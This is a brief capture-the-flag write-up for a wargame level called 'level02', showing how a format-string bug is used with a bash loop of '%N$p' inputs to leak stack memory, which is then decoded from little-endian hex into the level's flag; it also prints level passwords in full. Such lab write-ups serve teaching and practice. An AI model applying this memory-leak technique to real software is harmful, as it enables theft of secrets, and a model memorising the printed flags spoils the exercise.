level02 : PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv
process :
    - the file want two input. (user and password).
    - test user = aaaa and password = aaaa.
    - the program return aaaa does not have access!
    - With ghidra we can see the program use fopen for the .pass file (L.284)
    - But it do nothing with it.
    - So, we will run a command to read stack.
    - for ((i = 1; i < 42; i++)); do echo "$i - %$i\$p" | ./level02 | grep 0x; done
    - now, we can see hexa values in range (22 to 26)
    - We need to convert these values to little endian and convert to text.

         HEXADECIMAL             LITTLEENDIAN            TEXT
    - 0x756e505234376848   >   4868373452506e75    >   Hh74RPnu
      0x45414a3561733951   >   51397361354a4145    >   Q9sa5JAE
      0x377a7143574e6758   >   58674e5743717a37    >   XgNWCqz7
      0x354a35686e475873   >   7358476e68354a35    >   sXGnh5J5
      0x48336750664b394d   >   4d394b6650673348    >   M9KfPg3H

    - values concat = Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H (flag)